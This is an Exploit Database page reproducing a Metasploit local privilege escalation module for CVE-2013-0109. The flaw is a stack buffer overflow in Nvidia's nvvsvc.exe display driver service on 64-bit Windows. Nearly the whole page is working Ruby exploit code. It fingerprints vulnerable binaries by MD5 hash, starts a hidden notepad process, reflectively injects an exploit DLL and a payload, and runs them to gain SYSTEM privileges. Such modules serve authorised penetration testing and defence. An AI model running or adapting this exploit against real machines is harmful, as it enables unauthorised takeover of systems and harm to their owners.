Nvidia (nvsvc) Display Driver Service – Local Privilege Escalation (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2013-12-17
• 类别：

  • local
  平台：

  • windows_x86-64
• 来源：https://www.exploit-db.com/exploits/30393/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  require 'rex'
  require 'msf/core/post/common'
  require 'msf/core/post/windows/priv'
  require 'msf/core/post/windows/process'
  require 'msf/core/post/windows/reflective_dll_injection'
  require 'msf/core/post/windows/services'
  
  class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking
  
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Services
  
  def initialize(info={})
  super(update_info(info, {
  'Name'=> 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
  'Description' => %q{
  The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
  interact with the service. It contains a stacked based buffer overflow as a result
  of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
  the service name is 'nvsvc', and the named pipe is 'nsvr'.
  
  This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
  It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
  },
  'License' => MSF_LICENSE,
  'Author'=>
  [
  'Peter Wintersmith', # Original exploit
  'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
  ],
  'Arch'=> ARCH_X86_64,
  'Platform'=> 'win',
  'SessionTypes'=> [ 'meterpreter' ],
  'DefaultOptions'=>
  {
  'EXITFUNC'=> 'thread',
  },
  'Targets' =>
  [
  [ 'Windows x64', { } ]
  ],
  'Payload' =>
  {
  'Space' => 2048,
  'DisableNops' => true,
  'BadChars'=> "\x00"
  },
  'References'=>
  [
  [ 'CVE', '2013-0109' ],
  [ 'OSVDB', '88745' ],
  [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
  ],
  'DisclosureDate' => 'Dec 25 2012',
  'DefaultTarget'=> 0
  }))
  
  end
  
  def check
  vuln_hashes = [
  '43f91595049de14c4b61d1e76436164f',
  '3947ad5d03e6abcce037801162fdb90d',
  '3341d2c91989bc87c3c0baa97c27253b'
  ]
  
  os = sysinfo["OS"]
  if os =~ /windows/i
  svc = service_info 'nvsvc'
  if svc and svc['Name'] =~ /NVIDIA/i
  vprint_good("Found service '#{svc['Name']}'")
  
  begin
  if is_running?
  print_good("Service is running")
  else
  print_error("Service is not running!")
  end
  rescue RuntimeError => e
  print_error("Unable to retrieve service status")
  end
  
  if sysinfo['Architecture'] =~ /WOW64/i
  path = svc['Command'].gsub('"','').strip
  path.gsub!("system32","sysnative")
  else
  path = svc['Command'].gsub('"','').strip
  end
  
  begin
  hash = client.fs.file.md5(path).unpack('H*').first
  rescue Rex::Post::Meterpreter::RequestError => e
  print_error("Error checking file hash: #{e}")
  return Exploit::CheckCode::Detected
  end
  
  if vuln_hashes.include?(hash)
  vprint_good("Hash '#{hash}' is listed as vulnerable")
  return Exploit::CheckCode::Vulnerable
  else
  vprint_status("Hash '#{hash}' is not recorded as vulnerable")
  return Exploit::CheckCode::Detected
  end
  else
  return Exploit::CheckCode::Safe
  end
  end
  end
  
  def is_running?
  begin
  status = service_status('nvsvc')
  return (status and status[:state] == 4)
  rescue RuntimeError => e
  print_error("Unable to retrieve service status")
  return false
  end
  end
  
  def exploit
  if is_system?
  fail_with(Exploit::Failure::None, 'Session is already elevated')
  end
  
  unless check == Exploit::CheckCode::Vulnerable
  fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
  end
  
  print_status("Launching notepad to host the exploit...")
  
  windir = expand_path("%windir%")
  cmd = "#{windir}\\SysWOW64\\notepad.exe"
  process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
  host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
  print_good("Process #{process.pid} launched.")
  
  print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
  library_path = ::File.join(Msf::Config.data_directory,
   "exploits",
   "CVE-2013-0109",
   "nvidia_nvsvc.x86.dll")
  library_path = ::File.expand_path(library_path)
  
  print_status("Injecting exploit into #{process.pid} ...")
  exploit_mem, offset = inject_dll_into_process(host_process, library_path)
  
  print_status("Exploit injected. Injecting payload into #{process.pid}...")
  payload_mem = inject_into_process(host_process, payload.encoded)
  
  # invoke the exploit, passing in the address of the payload that
  # we want invoked on successful exploitation.
  print_status("Payload injected. Executing exploit...")
  host_process.thread.create(exploit_mem + offset, payload_mem)
  
  print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
  end
  end